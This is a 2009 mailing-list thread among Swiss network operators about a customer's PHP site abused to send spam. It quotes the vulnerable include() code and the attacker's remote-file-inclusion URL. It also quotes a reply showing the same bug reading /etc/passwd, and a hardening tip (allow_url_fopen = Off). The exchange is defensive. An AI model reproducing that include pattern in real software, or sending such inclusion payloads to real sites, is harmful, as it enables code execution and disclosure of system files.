Re: [swinog] F*ing Spammers and stupid customer code...

Thu, 19 Feb 2009 08:29:45 -0800 

luckily in this case: it's a windows server...

regards,

mike

-- 
Mike Kellenberger                      [email protected]
Escapenet - the Web Company                       Tel +41 52 235 0700
http://www.escapenet.ch                           Skype mikek70atwork


-----Ursprüngliche Nachricht-----
Von: [email protected] [mailto:[email protected]] Im 
Auftrag von Gianni Carafa
Gesendet: Donnerstag, 19. Februar 2009 17:04
An: [email protected]
Betreff: Re: [swinog] F*ing Spammers and stupid customer code...

Thats bad coding anyway :

http://www.thestupidcustomer.xy/index.php?called_page_link=/etc/passwd 



Regards Gianni





Radek Mrskos schrieb:
> I think, this is what you should have anyway  in your php.ini
>
>
> allow_url_fopen = Off
>
> /Radek
> Am 19.02.2009 um 16:31 schrieb Mike Kellenberger:
>
>   
>> Hi all
>>
>> Just stopped our mail server from spitting out thousands of spam
>> messages.
>>
>> We have a customer who has a site with the following (stupid) code in
>> his index.php:
>>
>> if($called_page_link!="")
>> {
>>      $requested_file=$called_page_link;
>> }
>>
>> include($requested_file);
>>
>>
>> The f*ing spammer found out about this and called the page with:
>>
>> http://www.thestupidcustomer.xy/index.php?called_page_link=http://geocit
>> ies.com/nimiuu/fuck.txt?
>>
>>
>> Boom.
>>
>> Have I already told you that I hate spammers? :-)
>>
>> Oh well, one down - a few million to go...
>>
>>
>> Regards,
>>
>> Mike
>>
>> -- 
>> Mike Kellenberger                      [email protected]
>> Escapenet - the Web Company                       Tel +41 52 235 0700
>> http://www.escapenet.ch                           Skype mikek70atwork
>>
>>
>> _______________________________________________
>> swinog mailing list
>> [email protected]
>> http://lists.swinog.ch/cgi-bin/mailman/listinfo/swinog
>>     
>
> Mit freundlichen Grüssen
>
> Radek Mrskos       Email: [email protected]
> Baechlerstr. 12    Tel:       +41 43 534 40 24
> CH-8802 Kilchberg  Mob: +41 79 219 68 66
> PGP:0x8CB69F6D           Fax: +41 86079 2196 866
>
> _______________________________________________
> swinog mailing list
> [email protected]
> http://lists.swinog.ch/cgi-bin/mailman/listinfo/swinog
>   
_______________________________________________
swinog mailing list
[email protected]
http://lists.swinog.ch/cgi-bin/mailman/listinfo/swinog
_______________________________________________
swinog mailing list
[email protected]
http://lists.swinog.ch/cgi-bin/mailman/listinfo/swinog

Antwort per Email an